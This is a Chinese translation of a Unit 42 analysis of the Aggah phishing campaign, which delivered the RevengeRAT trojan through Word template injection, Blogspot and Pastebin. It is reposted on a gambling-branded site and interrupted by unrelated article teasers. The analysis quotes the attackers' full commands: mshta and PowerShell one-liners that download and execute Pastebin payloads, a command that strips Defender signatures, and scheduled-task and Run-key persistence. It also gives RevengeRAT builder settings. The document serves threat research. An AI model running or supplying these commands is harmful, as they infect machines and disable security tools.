应用垂纶邮件流传RevengeRAT的Aggah行为 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

应用垂纶邮件流传RevengeRAT的Aggah行为

申博_新闻事件 申博 146次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

择要

2019年3月,Unit 42最先动手研讨一同重要针对中东国度的进击行动。研讨剖析注解,此项行动能够只是一同更大范围进击行动的前奏,其目标触及美欧亚三大洲。

此次进击行动重要经由历程鱼叉式收集垂纶邮件举行流传的,邮件携带了一个附件,在用户翻开后,附件会经由历程模板注入从长途效劳器加载一个启用了宏的歹意文件,而此文件又会指向BlogSpot来猎取歹意剧本,并经由历程该剧本从Pastebin上下载终究有用负载——RevengeRAT歹意软件。在研讨历程当中,我们发明了有好几类流传的文档,虽然内容能够有所相差,但都遵照雷同的流程,末了都是在用户机械上安装了在Pastebin上托管的RevengeRAT,这注解要挟行动者在全部进击运动中的TTP(战术、手艺和历程)是稳定的。

最后,我们推想此项行动能够与Gorgon构造有关,来由有两个:一个是高水平的TTP,二是对RevengeRAT歹意软件的应用。但我们以后还没法取得一些更肯定性的目标与Gorgon构造相匹配,尚且没法将其归因于Gorgon构造。

因而我们决议将此项行动称为Aggah行动,“Aggah”这个称号来源于Pastebin上一个托管RevengeRAT payload的账户名,也是用于支解发送到RevengeRAT C2效劳器的数据的分隔符。

流传历程

我们对Aggah行动的研讨始于2019年3月27日猎取的一封文件,此文件经由历程电邮的体式格局发送到了某个中东国度的构造机构手里。这封邮件假装本国一家大型金融机构的身份,示知用户的“账户被锁定了”。最后,这封文件只涌现在了一个国度,在教诲、媒体/营销和当局垂直部分的机构中涌现比率最高,而在四天后的3月31日,我们看到一样的邮件被发送到了第二个中东国度的某家金融机构。厥后跟着时候的推移,更多踪影逐步浮出水面,此次行动不单单针对中东区域,美国、欧洲和亚洲的多个构造机构也一样涌现了这份文件的身影,且进击者针对的目标是教诲、媒体、手艺、零售、制作、州/地方当局、旅店、医疗等行业。由于文件在功用上是相似的,以是我们将形貌之前剖析的原始样本。

3月27日发送的电子邮件中附带一个Word文档,文件名为“Activity.doc”(SHA256:d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946),翻开后会试图经由历程模板注入加载长途OLE文档,详细历程以下:当翻开“Activity.doc”时,会显现图1,引诱用户启用宏,启动前提必需是桌面版本的Microsoft Word,由于宏在Office 365的Word的联机版本中不起作用。“Activity.doc”文件自身不包罗宏,但从长途效劳器加载的OLE文包罗了一个宏。

应用垂纶邮件流传RevengeRAT的Aggah行为

图1. Activity.doc中用于引诱用户启用宏的截图

Activity.doc剖析

此文档应用模板注入来加载托管在长途效劳器上的文件。图2显现了文档页脚的内容,它会从hxxps://static.wixstatic [.] com / ugd / 05e470_b104c366c1f7423293887062c7354db2.doc处加载长途OLE文档:

应用垂纶邮件流传RevengeRAT的Aggah行为

图2.Activity.doc文档页脚,显现了长途OLE文件地点地

加载的OLE文件实际上是一个RTF文件(SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f),它应用一个经由殽杂的宏加载嵌入的Excel文档,宏里包罗了大批“渣滓”代码。这个宏的目标是经由历程“Shell”敕令解码并实行以下URL内容:

mshta hxxp://www.bitly[.]com/SmexEaldos3

上面的敕令应用了内置的“mshta”应用顺序来下载URL所供应的内容,URL是用Bit.ly天生的短链接。由WildFire剖析后,短链接会重定向到hxxps://bjm9.blogspot [.] com / p / si.html,如图3中HTTP响应的“Location”字段所示。

应用垂纶邮件流传RevengeRAT的Aggah行为

图3.短链接,指向Blogspot

图4展现了链接指向的内容,一篇看起来有点新鲜的BlogSpot文章。

应用垂纶邮件流传RevengeRAT的Aggah行为

图4.bjm9.blogspot (.]com屏幕截图

经由历程剖析博客上的代码,我们发明它实际上包罗了一个JavaScript剧本,如图5所示。

应用垂纶邮件流传RevengeRAT的Aggah行为

图5.嵌入的JavaScript剧本

歹意剧本在植入体系后可实行多个运动。起首,它会试图经由历程删除署名集来阻挠Microsoft Defender。该剧本还能杀死Defender历程和一些Office应用顺序的历程。一切这些都是应用以下敕令行实行的:

cmd.exe /c cd “”%ProgramFiles%\Windows Defender”” & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c “”taskkill /f /im MSASCuiL.exe”” & forfiles /c “”taskkill /f /im MpCmdRun.exe”” & exit

接着该剧本会试图禁用Office产物中的平安机制,尤其是经由历程设置注册表项值来启用宏和禁用ProtectedView。启用Word、PowerPoint和Excel中的宏的操纵是经由历程将某些注册表项(见附录)设置为值“1”来完成的。

禁用Word、PowerPoint和Excel中的ProtectedView平安机制则是将另一些注册表项(见附录)设置为“1”。

我们之前的博文中曾讲过Gorgon构造在Office中启用宏和禁用ProtectedView的手艺,和对注册表项递次的修正。别的,此次行动中中断Windows Defender和Microsoft Office应用顺序历程的战略也与Gorgon构造一模一样,并且Gorgon在之前的进击行动中也曾用bit.ly缩写URL的行动,虽然存在显着的手艺堆叠,但仍然缺少详细的证据注解此次进击运动与Gorgon有关。托管在Blogspot上的剧本重要实行三个运动,包罗:

1、从Pastebin 处下载payload

2、建立调理义务,以便按期从Pastebin URL猎取和运转剧本

3、建立一个自动注册表项,以从Pastebin URL猎取和运转剧本

从Pastebin上取得payload

此歹意剧本起首从Pastebin URL处取得一个可移植的可实行payload并将其实行,猎取payload敕令以下,实行历程则是经由历程挪用WScript.Shell来运转。

mshta.exe vbscript:CreateObject(“”Wscript.Shell””).Run(“”powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString(\’h\’+\’t\’+\’t\’+\’p\’+\’s:\’+\’//p\’+\’a\’+\’s\’+\’t\’+\’e\’+\’b\’+\’i\’+\’n\’+\’.\’+\’c\’+\’o\’+\’m\’+\’/\’+\’r\’+\’a\’+\’w\’+\’/\’+\’2LDaeHE1\’))).EntryPoint.Invoke($N,$N)””,0,true)(window.close)

上面的敕令用于下载一个可移植的可实行文件,该文件托管在Pastebin上,网址为https://pastebin[.]com/raw/2LDaeHE1,对其base64解密后实行。图6显现了payload地点的Pastebin页面。

应用垂纶邮件流传RevengeRAT的Aggah行为

图6.2 ldaehe1 Pastebin页面

解码后的payload具有以下属性:

应用垂纶邮件流传RevengeRAT的Aggah行为

表1.解码后的payload

这个payload是用VB.NET编写的,名为“Nuclear Explosion”,它是RevengeRAT的变种,C2的域为“lulla.duckdns [.] org”,如图7所示。

应用垂纶邮件流传RevengeRAT的Aggah行为

图7.RevengeRAT设置装备摆设

依据图8所示的设置装备摆设,当向C2效劳器发送数据时,将应用分隔符“hagga”拆分信息,该字符串与托管payload的PasteBin帐户的称号雷同(如图6所示)。

应用垂纶邮件流传RevengeRAT的Aggah行为

图8.用于支解发送到C2效劳器信息的字符串“hagga”的设置装备摆设

建立计划义务

托管在Blogspot的剧本还包罗另一个敕令,用于建立一个名为“eScan Backup”的计划义务,每100分钟运转一次。用于建立此计划义务的剧本天生的敕令字符串为:

第三届中国数据安全治理高峰论坛圆满落幕 探析等保2.0对数据安全的要求

第三届中国数据安全治理高峰论坛在公安部网络安全保卫局的指导下,中关村大数据产业联盟、中关村数安大数据安全产业联盟的支持下,4月26日,在北京富力万达嘉华酒店圆满落幕。本次峰会由中国(中关村)网络安全与信息化产业联盟、北京网络信息安全技术创新产业联盟、中国保密协会产业分会共同主办,北京安华金和科技有限公司承办,北京奇安信科技有限公司(360企业安全集团)、国网思极检测技术(北京)有限公司、北京中睿天下信息技术有限公司、北京炼石网络技术有限公司等多家

schtasks /create /sc MINUTE /mo 100 /tn eScan Backup /tr “”mshta vbscript:CreateObject(“”Wscript.Shell””).Run(“”mshta.exe https://pastebin[.]com/raw/tb5gHu2G””,0,true)(window.close)”” /F ‘

“eScan Backup”义务将应用内置的mshta应用顺序从Pastebin URL:hxxps://pastebin[.]com/raw/tb5gHu2G处下载剧本,我们将其称为tb5gHu2G剧本。 我们以为,要挟行动者之以是挑选“eScan Backup”这个称号,与eScan防病毒产物相干。图9显现了Windows的Task Scheduler顺序中的计划义务。

应用垂纶邮件流传RevengeRAT的Aggah行为

图9.每100分钟建立一个调理义务,来接见Pastebin URL并运转托管剧本

计划义务将下载并运转tb5gHu2G剧本,这么做的目标是为了保持持久性,它会运转雷同的敕令来障碍Windows Defender并停止Office应用顺序。tb5gHu2G剧本还会实验运转与Blogspot上托管剧本雷同的VBScript,VBScript下载并实行图6中所示的“2LDaeHE1”Pastebin页面的payload。图10显现托管tb5gHu2G剧本的Pastebin页面。

应用垂纶邮件流传RevengeRAT的Aggah行为

图10. tb5gHu2G Pastebin页面

建立自动运转注册表项

托管在Blogspot上的剧本会建立了一个自动运转的注册表项,它好像是第二个持久性机制,用于增补上述的计划义务。要建立自动运转项,剧本将天生以下敕令并运转:

CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate”, “C:\Windows\System32\mshta.exe vbscript:CreateObject(“”Wscript.Shell””).Run(“”mshta.exe%20http://pastebin[.]com/raw/YYZq1XR0″”,0,true)(window.close)” , “REG_EXPAND_SZ”

此运转项将下载另一个托管在Pastebin上的内容,地点是http:// pastebin [.] com / raw / YYZq1XR0。

并将下载的内容作为剧本由Wscript.Shel运转。 图11是Pastebin页面的响应内容。

应用垂纶邮件流传RevengeRAT的Aggah行为

图11. YYZq1XR0 Pastebin页面

YYZq1XR0包罗以下剧本,它的作用相对较少:

<script language=”VBScript”>
 
self.close
 
</script>

上述剧本的功用很少,这注解要挟行动者在须要时能够用其他功用的新剧本举行替代。这些内容都是由名为HAGGA的帐户建立的,以下图12所示,包罗了用于建立终究payload的其他剧本。

应用垂纶邮件流传RevengeRAT的Aggah行为

图12. Hagga的Pastebin页面

行动网

在观察此项行动时,我们搜检了Bit.ly上供应的点击次数。停止2019年4月11日,援用的Bit.ly SmexEaldos3链接在北美、欧洲、亚洲和中东的约20个国度/区域总计凌驾1,900次点击。云云高的点击量向我们注解,我们能够只看到了实际行动中极小的一部分。这些点击极能够还包罗在观察和研讨工作时期接见的小我,因而,这个数字并不能正确透露表现被沾染机械的数目。

应用垂纶邮件流传RevengeRAT的Aggah行为

图13.点击状况表示

接着我们检察了文档属性,以相识能够应用哪些附加的信息来资助运动辨认。文档属性注解,其背地的操纵职员应用的是盗版的Microsoft Word,文档署名为“Lulli moti myri”,经由历程该名字我们在存储库中搜刮并标识了十多个Microsoft Office文档——个中一半是DOCX,另一半是XLS。

一切文档在2019年1月到4月之间都有一个时候戳,每一个文档都包罗一个重定向到Blogspot页面的Bit.ly链接。在剖析历程当中,我们肯定了几个终究指向RevengeRAT的下载链接。个中一个样本的C2域为kronozzz2.duckdns[.]org。这个样本的域名让我们联想到HAGGA中有一个标题为’kronoz2 back2new’的文件,二者能够有联络。末了我们发明与RevengeRAT样本相干联的域名都是相似kronoz.duckdns [.] org的构造。

在搜检了一切的文档和RevengeRAT payload以后,我们发明除个中一个payload以外,其他一切都包罗互斥锁RV_MUTEX-WindowsUpdateSysten32(注重进击者将“System32”毛病地拼写为“Systen32”)和一个base64编码的标识符SE9URUlTIE5PVk9T,该标识符解码为HOTEIS NOVOS(葡萄牙语中的“NEW HOTELS”)。我们搜刮了可用的存储库,检察有若干样本包罗这些字符串,早在2018年9月就有50多个文件,并且很多样本都包罗雷同的“hagga”字符串,同时我们还注重到了别的三项:“oldman”、“steve”和“roma225”。在2018年12月,Yoroi就曾宣布了一篇名为《神奇的roma225》的文章讨论这个“roma225”的标识。

联系关系RevengeRAT的样本

RevengeRAT是一种商品木马,它有很多外泄的构建器,开源免费供应,该东西应用的提高使得我们很难将其归因于特定群体。因而,我们想肯定在Aggah相干样本中看到的互斥锁、标识符和项是不是不是RevengeRAT的规范默许值,和可否在逻辑上建立猛烈的联系关系性。为了权衡两个不相干的要挟行动者在设置装备摆设中应用雷同值的能够性,我们应用了RevengeRAT构建器(v0.3)来可视化要挟行动者的构建历程。

我们发明,两个不相干的个别应用雷同互斥锁、标识符和项的能够性很小,由于RevengeRAT构建器中的有些特定字段必需手动输入,包罗互斥锁、标识符和项。在下面诠释构建木马所需的步调时我们会重点引见这些字段。

要建立RevengeRAT payload,进击者须要应用RevengeRAT效劳器编译设置装备摆设了恰当字段的可实行文件。起首就须要将“Socket Key”字段设置为“hagga”并点击“Start Listening”,如图14所示。

应用垂纶邮件流传RevengeRAT的Aggah行为

图14. RevengeRAT构建器Socket Key的设置

设置装备摆设好效劳器并设置侦听以后,单击“Client Builder”来建立RevengeRAT客户端,如图15所示。

应用垂纶邮件流传RevengeRAT的Aggah行为

图15. RevengeRAT Client Builder

在Client Builder中,单击“Network Settings”下拉框并输入域名“lulla.duckdns[.]org” ,在按下add之前,TCP端口为2336,如图16所示。

应用垂纶邮件流传RevengeRAT的Aggah行为

图16. RevengeRAT Network Settings设置

以后单击“Basic Settings”下拉列表并在“Client Identifier”字段中输入所选标识符“HOTEIS NOVOS”,并在“Client Mutex”字段中增加“-WindowsUpdateSysten32”(Client Mutex已默许包罗“RV_MUTEX”字符串),如图17所示。这里须要注重的是,“-WindowsUpdateSysten32”须要手动增加,而不是点旁边的加号(“+”)按钮,否则会衔接一个连字符和一个随机字符串。

应用垂纶邮件流传RevengeRAT的Aggah行为

图17. RevengeRAT Basic Settings设置

末了编译payload之前,须要赞同效劳条目并单击“compile”,如图18所示。

应用垂纶邮件流传RevengeRAT的Aggah行为

图18. RevengeRAT编译前

按下compile后,RevengeRAT效劳器将建立一个默许称号为“Client.exe”的客户端可实行文件,可在进击前保存到体系中。图19显现了桌面上的RevengeRAT客户端图标。

应用垂纶邮件流传RevengeRAT的Aggah行为

图19. RevengeRAT客户端图标

经由上述步调编译的“Client.exe”设置装备摆设看上去和Aggah行动中的RevengeRAT的设置装备摆设一样(如图7和图8)。这注解进击者也是遵照相似的步调来建立的,申明进击者可有多是统一人。

结论

依据我们最后的遥测数据,Aggah行动好像只是针对中东某一国度睁开的,但是跟着观察的深切,逐步在美国,欧洲和亚洲也看到Aggah行动涌现的踪影,但以现在的数据集我们还没法深切相识进击者的效果。

RevengeRAT是一种公然可用的RAT木马,经常能在进击行动中看到。从近期的案例来看,一些应用者好像最先应用多层机制使之变得更庞杂。对这些手艺的应用能够会资助进击者隐藏在正当的效劳而中不会被平安设备屏障。

附录

歹意剧本启用Word、PowerPoint和Excel中的宏时设置为“1”的注册表项、和禁用Word、PowerPoint和Excel中的ProtectedView平安机制时设置为“1”的注册表项、IoC、歹意剧本的下载链接、C2地点请点击此处。

Symantec终端防护内核内存信息泄漏漏洞分析(CVE-2018-18366)

概述 Cisco Talos在赛门铁克终端防护(Symantec Endpoint Protection)小型企业版的ccSetx86.sys内核驱动中发现了一个信息泄漏漏洞。该漏洞位于驱动程序的控制消息处理程序中。攻击者可以发送精心制造的请求,使得驱动程序返回未经初始化的内核内存块,从而可能泄漏敏感信息。例如,攻击者可以将该漏洞用于绕过特权令牌或内核内存地址等内核安全缓解方式。非特权用户可以以用户模式运行程序,从而触发这一漏洞。 根据我们的协调披露政策,Talos与Symantec进行了合作,从而确保为


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明应用垂纶邮件流传RevengeRAT的Aggah行为
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址